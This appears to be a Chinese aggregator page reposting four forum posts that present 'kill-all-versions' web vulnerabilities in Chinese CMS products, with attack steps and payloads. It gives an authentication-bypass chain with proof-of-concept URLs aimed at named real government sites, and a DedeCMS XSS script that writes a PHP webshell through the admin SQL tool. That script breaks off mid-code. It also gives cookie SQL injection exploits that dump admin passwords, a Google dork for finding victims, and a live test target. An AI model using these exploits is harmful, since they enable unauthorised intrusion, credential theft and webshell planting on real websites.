下面小编给大家整理了大汉网络0day通杀所有系统和版本,本文共4篇,供大家阅读参考。本文原稿由网友“雪松”提供。
篇1:大汉网络0day通杀所有系统和版本
管理后台权限绕过,进入后台后轻松GetShell,
经验证通杀所有系统和版本,包括:jcms,jact,jsearch,vipchat,vc,xxgk等等,
我估计这是大汉影响范围最大的漏洞了。求加精!
Setup目录Session权限绕过:
代码分析 /jcms/setup/opr_licenceinfo.jsp : //获取Session中cookie_username的值,赋值给strUser String strUser = (String)sessions.getAttribute(“cookie_username”); // 判断strUser值 是否为空? if( strUser == null || strUser.trim.length() == 0 ) { out.println('请先登录!') return; } //如果为空,则未登录,直接返回// 如果不为空,说明已经登录
逆向java servlet 的代码 /VerifyCodeServlet
// 获取请求参数 var,赋值给 strVar String strVar = Convert.getParameter(request, “var”, “”); if(strVar == null){ request.getSession().setAttribute(“COMPLAT”, str_code); // 将随机码保存到SESSION中 }else{ // 如果 strVar 不为空的话,创建 strVar 为名称的 SESSION 值 request.getSession().setAttribute(strVar, str_code); // 将随机码保存到SESSION中 }所以通过参数 var, 就可以控制SESSION的名称的创建
通过两个程序的分析,整理一下:
1. opr_licenceinfo.jsp需要一个SESSION cookie_username 不为空,就可以成功登录
2. /VerifyCodeServlet 可以 创建任意 SESSION的key值
所以两者配合,就可以构造成功登录了。
直接访问opr_licenceinfo.jsp 需要登录
www.zgzhijiang.gov.cn/jcms/setup/opr_licenceinfo.jsp
添加一个Session值 cookie_username
www.zgzhijiang.gov.cn/jcms/VerifyCodeServlet?var=cookie_username
然后再次访问/jcms/setup/opr_licenceinfo.jsp,成功登录,
Licence文件上传webshell漏洞,不演示了,参考:wooyun.org/bugs/wooyun--052699
vipchat 的 POC:
sdds.gov.cn/vipchat/setup/
sdds.gov.cn/vipchat/VerifyCodeServlet?var=cookie_username
sdds.gov.cn/vipchat/setup/admin.jsp
jsearch 的 POC:
www.hyhjbh.com/jsearch/setup/
www.hyhjbh.com/jsearch/VerifyCodeServlet?var=cookie_username
www.hyhjbh.com/jsearch/setup/opr_licenceinfo.jsp
其他的大汉系统,就不一一罗列了,
这算是一个VerifyCodeServlet组件的逻辑漏洞吧,
大汉的所有系统都包含VerifyCodeServlet这个组件,用于生成验证码,
所以导致了所有系统的通杀,影响范围非常广了。
注意:
1. 有一些站点,访问setup目录,返回403,禁止了访问。
2. 大汉新版,不影响。
解决方案:
修复VerifyCodeServlet组件的逻辑。
篇2:DEDECMS xss 0day 通杀所有版本漏洞预警
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行,可getshell
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿
注册会员—-发表文章
内容填写:
新建xss.css,内容:
body{
background-image:url(´javascript.:document.write(“”)´)
}
新建xss.js文件,内容:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(´text/xml´);
}
} else if(window.ActiveXObject) {
var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];
for(var i=0; i try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request; function getFolder( url ){ bj = url.split(´/´) return obj[obj.length-2] } Url = top.location.href; u = getFolder(oUrl); add_admin(); function add_admin(){ var url= “/”+u+“/sys_sql_query.php”; var params =“fmdo=edit&backurl=&activepath=/data&filename=haris.php&str=
篇3:简单文章管理系统 cookie注入漏洞通杀所有版本漏洞预警
简单文章管理系统采用一级分类,界面简洁,功能简单实用,删除文章后,文章相关图片也一并删除减
少垃圾文件的存在。
后台管理入口域名/admin 用户名和密码都是admin
后台模块:
信息管理: 发布信息 修改信息 查找信息 推荐信息
系统管理: 类别管理 用户管理 系统设置 数据库维护
漏洞文件:article.asp Check_SqlIn.asp 代码我就不作分析了。网上多的是,差不多的问题。
漏洞说明:过滤不严,导致可cookie注入。
好像有两个字段14和12。
exp:
javascript.:alert(document.cookie=”id=“+escape(”119 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin“));
javascript.:alert(document.cookie=”id=“+escape(”235 union select 1,2,3,user,5,password,7,8,9,10,11,12 from admin“));
利用方法我就不说了,网上很多,整天JJYY还是这点破事,
有图有真像:
拿shell方法:
暂时没有更好的办法,但是如果他的数据库是.asp .asa后缀的话,可在
www.xxx.com/data/!%article%!.asp
改变下成:www.xxx.com/data/%21%25article%25%21.asp
没对数据库访问进行处理。 ING~~~~~~~
用户管理--->增加管理员中 帐户写上一句话变型马。然后菜刀之类的连就可以了。
dork:
inurl:list.asp?classid=1 首页 上一页 下一页 尾页 页次:页 共 条记录 条记录/页 转到:
注意后面的字哦。。。^_^
From: www.0855.tv
By: Mr.DzY
篇4:启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警
by Mr.DzY
from www.0855.tv
由于网上开源的东西多了,版权就无从查起,这天姑且就这么称乎它吧。
具体版权无从查知,相似的内核太多。
源码下载:www.mycodes.net/25/4628.htm
:www.tb11.net/
官方演示:www.tb11.net/system/xitong/
www.tb11.net/system/xitong2/
www.tb11.net/system/xitong3/
直接上exploit:
javascript.:alert(document.cookie=”id=“+escape(”1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin\"));
test:www.tb11.net/system/xitong/shownews.asp?id=210
测试关键字自己找,
- 大连市国家税务局网络申报系统v2.02022-12-11
- 控制和系统专业英文信2024-04-19
- 基于CDMA网络的移动数据通信系统论文2022-12-11
- 网络不稳定的原因和解决方法2023-01-26
- 我和网络750字作文2024-01-19
- 基于网络的实习生关怀系统的设计教育论文2023-12-24
- 魔方网络摄影系统注入漏洞及利用漏洞预警2022-12-15
- Win7系统提示未识别的网络的解决办法网络技巧2023-10-17
- 我和网络的故事作文400字2022-12-18
- 如何诊断和调试Windows系统蓝屏2022-12-11